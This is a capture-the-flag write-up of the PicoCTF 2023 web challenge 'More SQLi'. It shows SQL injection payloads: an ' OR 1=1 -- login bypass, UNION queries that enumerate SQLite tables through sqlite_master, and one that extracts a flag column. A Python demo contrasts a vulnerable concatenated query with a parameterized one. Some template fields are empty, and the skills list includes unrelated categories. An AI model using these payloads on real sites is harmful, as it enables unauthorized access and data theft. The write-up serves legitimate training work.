🌐 More SQLi

A detailed write-up of the Web challenge 'More SQLi' from PicoCTF - 2023

/images/PicoGym/PicoCTF-2023/MoreSQLi/challenge_presentation.png
Challenge Presentation

📊 Challenge Overview

Category Details Additional Info
🏆 Event PicoGym Event Link
🔰 Category Web 🌐
💎 Points Out of 500 total
⭐ Difficulty 🟡 Medium Personal Rating: 1/10
👤 Author Mubarak Mikail Profile
🎮 Solves (At the time of flag submission) 12.878 solve rate
📅 Date 11-02-2025 PicoGym
🦾 Solved By mH4ck3r0n3 Team:

📝 Challenge Information

Can you find the flag on this website.

🎯 Challenge Files & Infrastructure

Provided Files

Files: None

🔍 Initial Analysis

First Steps

Initially, the website appears as follows:

/images/PicoGym/PicoCTF-2023/MoreSQLi/site_presentation.png
Site Presentation

Given the challenge description, I used the payload ' OR 1=1 -- as both username and password to access the site, and it worked:

/images/PicoGym/PicoCTF-2023/MoreSQLi/login.png
Login

We are presented with a search box, which is most likely where the SQL injection has to be performed. From the hint, we are told that the backend is SQLite. I tried the same simple injection here, ' OR 1=1 --, but nothing useful happened, since the query only returns rows from the table displaying offices. So I immediately tried a UNION-based injection:

' UNION SELECT * FROM users;

/images/PicoGym/PicoCTF-2023/MoreSQLi/admin_user.png
Admin User

The query returned the single admin user stored in the database, which confirmed that a UNION-based injection works. So the first thing I did was retrieve the SQLite version:

' UNION SELECT 1,2,sqlite_version();

The payload selects exactly three values because the page displays three columns, as seen in the table, and a UNION query must return the same number of columns as the main query:

/images/PicoGym/PicoCTF-2023/MoreSQLi/version.png
Version

Doing so, I was able to obtain the SQLite version 3.31.1. Now that we know how to perform the injection, let’s move on to the exploitation.

🔬 Vulnerability Analysis

Potential Vulnerabilities

  • SQL Injection

🎯 Solution Path

Exploitation Steps

Initial setup

Most likely, the flag will be in one of the other tables, so to enumerate them, I can use sqlite_master as follows:

' UNION SELECT 1,2,tbl_name FROM sqlite_master WHERE type='table' --

/images/PicoGym/PicoCTF-2023/MoreSQLi/table_enumeration.png
Table Attribute Enumeration

As we can see, the third column of the HTML table returns the tables contained in the database. The table more_table looks quite suspicious. Let’s move on to the exploitation.

Exploitation

To perform the SELECT, we need to know the column names of the tables, which we can enumerate again using sqlite_master:

' UNION SELECT 1,2,sql FROM sqlite_master WHERE tbl_name='more_table' --

/images/PicoGym/PicoCTF-2023/MoreSQLi/column_enumeration.png
Column Attribute Enumeration

Indeed, the more_table table contains a flag column. Now, we just need to print it by executing:

' UNION SELECT 1,2,flag FROM more_table --

And as we can see, the flag is displayed.

Flag capture

/images/PicoGym/PicoCTF-2023/MoreSQLi/manual_flag.png
Manual Flag

🛠️ Exploitation Process

Approach

The automatic exploit logs in using the injection 'OR 1=1 -- in the username and password fields and then performs the injection in the main page’s search field, as previously demonstrated. Finally, it extracts the flag using a regex from the response text.
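To show why the enumeration payloads above succeed and what stops them, here is an added example (not the write-up's own exploit or the challenge's real source) built on an in-memory SQLite database that mirrors the challenge layout: an offices table with three displayed columns and a more_table holding a constructed placeholder flag. The vulnerable search assumes the challenge concatenated the input into a quoted string (the actual server query is not on the page); the hardened version binds the input as a parameter, and the flag extraction uses the same regex idea as the automated exploit.

```python
import re
import sqlite3

FLAG_RE = re.compile(r"picoCTF\{[^}]*\}")


def build_db() -> sqlite3.Connection:
    """Constructed in-memory database mirroring the challenge's table layout."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'admin', 'constructed-password');
        CREATE TABLE offices(id INTEGER, name TEXT, city TEXT);
        INSERT INTO offices VALUES (1, 'HQ', 'Lagos'), (2, 'Branch', 'Abuja');
        CREATE TABLE more_table(id INTEGER, flag TEXT);
        INSERT INTO more_table VALUES (1, 'picoCTF{constructed_placeholder}');
    """)
    return conn


def search_vulnerable(conn, term):
    """Assumed shape of the challenge's search: input spliced into the SQL.
    A UNION with three columns matches the three displayed columns, and the
    trailing -- comments out the closing quote, as in the write-up."""
    query = f"SELECT id, name, city FROM offices WHERE name = '{term}'"
    return conn.execute(query).fetchall()


def search_safe(conn, term):
    """Hardened form: the input is bound as a value, so quotes, UNION and
    comment markers are compared against office names, never parsed as SQL."""
    query = "SELECT id, name, city FROM offices WHERE name = ?"
    return conn.execute(query, (term,)).fetchall()


def extract_flag(rows):
    """Pull a flag out of result rows with a regex, like the automated exploit."""
    match = FLAG_RE.search(" ".join(str(cell) for row in rows for cell in row))
    return match.group(0) if match else None


if __name__ == "__main__":
    conn = build_db()
    for payload in (
        "' UNION SELECT 1,2,sqlite_version() -- ",
        "' UNION SELECT 1,2,tbl_name FROM sqlite_master WHERE type='table' -- ",
        "' UNION SELECT 1,2,flag FROM more_table -- ",
    ):
        print("vulnerable:", search_vulnerable(conn, payload))
        print("safe      :", search_safe(conn, payload))
```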

🚩 Flag Capture

Flag

Proof of Execution

/images/PicoGym/PicoCTF-2023/MoreSQLi/automated_flag.png
Automated Flag
Screenshot of successful exploitation

🔧 Tools Used

Tool Purpose
Python Exploit

💡 Key Learnings

Skills Improved

  • Binary Exploitation
  • Reverse Engineering
  • Web Exploitation
  • Cryptography
  • Forensics
  • OSINT
  • Miscellaneous

📚 References & Resources

Official Documentation

Learning Resources


📊 Final Statistics

Metric Value Notes
Time to Solve 00:03 From start to flag
Global Ranking (At the time of flag submission) Challenge ranking
Points Earned Team contribution

Created: 11-02-2025 • Last Modified: 11-02-2025 • Author: mH4ck3r0n3 • Team: